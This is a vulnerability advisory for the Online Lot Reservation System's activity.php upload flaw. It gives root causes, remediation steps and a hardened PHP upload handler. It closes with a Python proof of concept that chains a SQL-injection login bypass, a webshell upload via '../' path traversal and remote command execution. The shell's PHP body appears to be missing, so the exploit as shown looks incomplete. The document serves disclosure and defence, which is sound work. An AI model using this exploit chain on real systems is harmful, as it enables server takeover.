# code-projects Online Lot Reservation System V1.0 Vulnerability Summary

## Vulnerability Overview

* **Project Name**: Online Lot Reservation System V1.0
* **Vulnerable File**: `activity.php`
* **Vulnerability Type**: Arbitrary File Upload + Path Traversal
* **Trigger Conditions**: No authentication or authorization required (an administrator session can be obtained via SQL Injection)
* **Root Causes**:
  1. **Bypassable File Type Detection**: Uses `getimagesize()` to detect file types; attackers can bypass this by prepending the GIF89a magic bytes.
  2. **Controllable Directory Parameter**: The `directory` parameter is concatenated directly into the upload path without filtering.
  3. **Path Traversal Vulnerability**: Attackers can use `../` to traverse to the web root directory.
  4. **Unchanged Filename**: The original filename of the uploaded file is used directly without renaming.

## Impact Scope

* Attackers can upload malicious files to arbitrary directories.
* Attackers can upload files to the web root directory.
* Attackers can execute arbitrary system commands remotely.
* Attackers may gain complete control over the server.

## Remediation

1. **Strictly Validate Directory Parameters**: Restrict the `directory` parameter to an allow-list of permitted directories.
2. **Prevent Path Traversal**: Reject or strip sequences like `../` and verify that the resolved final path lies within the allowed base directory.
3. **Strict File Type Validation**: Only allow specific extensions (e.g., jpg, jpeg, gif, png).
4. **Verify File MIME Type**: Use tools like `finfo` to validate the file header information rather than trusting the client-supplied content type.
5. **Rename Uploaded Files**: Use random filenames (e.g., via `uniqid()`) to avoid overwriting or predicting filenames.
6. **Disable Execution in Upload Directories**: Configure the web server (e.g., Apache/Nginx) to prevent the execution of PHP files in upload directories.
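The following hardened upload handler implements remediation steps 1 to 5 above. It is an added example, not code from the Online Lot Reservation System; the form field names `image` and `directory` follow the advisory, while `ALLOWED_DIRS`, the `uploads` base directory and the function name `safeUpload` are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-lists for this example (not taken from the project).
const ALLOWED_DIRS = ['activities', 'lots'];                    // step 1
const ALLOWED_EXT  = ['jpg', 'jpeg', 'gif', 'png'];             // step 3
const ALLOWED_MIME = ['image/jpeg', 'image/gif', 'image/png'];  // step 4

function safeUpload(array $file, string $directory, string $baseDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error');
    }
    // 1. The directory must come from the allow-list; no user-built paths.
    if (!in_array($directory, ALLOWED_DIRS, true)) {
        throw new RuntimeException('directory not allowed');
    }
    // 2. Resolve the target with realpath() and confirm it stays under $baseDir
    //    (defence in depth: also catches symlinks or a mis-edited allow-list).
    $base   = realpath($baseDir);
    $target = realpath($baseDir . '/' . $directory);
    if ($base === false || $target === false
        || strpos($target . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('path traversal detected');
    }
    // 3. Extension allow-list; the client filename is only used to pick the suffix.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('extension not allowed');
    }
    // 4. MIME type derived from the file contents via finfo, not from the
    //    client-supplied Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        throw new RuntimeException('content is not an allowed image');
    }
    // 5. Random server-side filename; the original name never reaches the filesystem.
    $newName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest    = $target . DIRECTORY_SEPARATOR . $newName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Usage, assuming the same form field names as the vulnerable activity.php:
// $stored = safeUpload($_FILES['image'], $_POST['directory'] ?? '', __DIR__ . '/uploads');
```

Step 6 is a web-server setting rather than PHP code: for Apache, a `.htaccess` in the upload directory containing `php_flag engine off` (or a `<FilesMatch "\.php$">` deny rule) ensures that even a file that slips past these checks is served as static content, never executed.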
## POC Code (Python)

```python
#!/usr/bin/env python3
import requests
from urllib.parse import urljoin

url = "http://127.0.0.1:7777"
cmd = "system('whoami');"
s = requests.Session()

# 1. SQL Injection to Obtain Cookies
login_url = urljoin(url, "/onlineLot/loginuser.php")
payload = {
    "email": "admin' OR '1'='1' -- ",
    "password": "test"
}
r = s.post(login_url, data=payload, allow_redirects=False)
if r.status_code != 302:
    print("[-] Login failed")
    exit()
print("[+] Login success")

# 2. Upload WebShell (Path traversal to the root directory)
upload_url = urljoin(url, "/onlineLot/activity.php")
shell = b"GIF89a "
files = {'image': ('shell.php', shell, 'image/gif')}
data = {'directory': '../', 'date': '2024-05-01', 'id': '1'}
r = s.post(upload_url, files=files, data=data, allow_redirects=False)
if r.status_code != 302:
    print("[-] Upload failed")
    exit()
print("[+] Shell uploaded")

# 3. Execute Commands
shell_url = urljoin(url, "/onlineLot/shell.php")
r = s.get(shell_url, params={'cmd': cmd})
print("[+] Command output:")
print(r.text.replace("GIF89a", "").strip())
```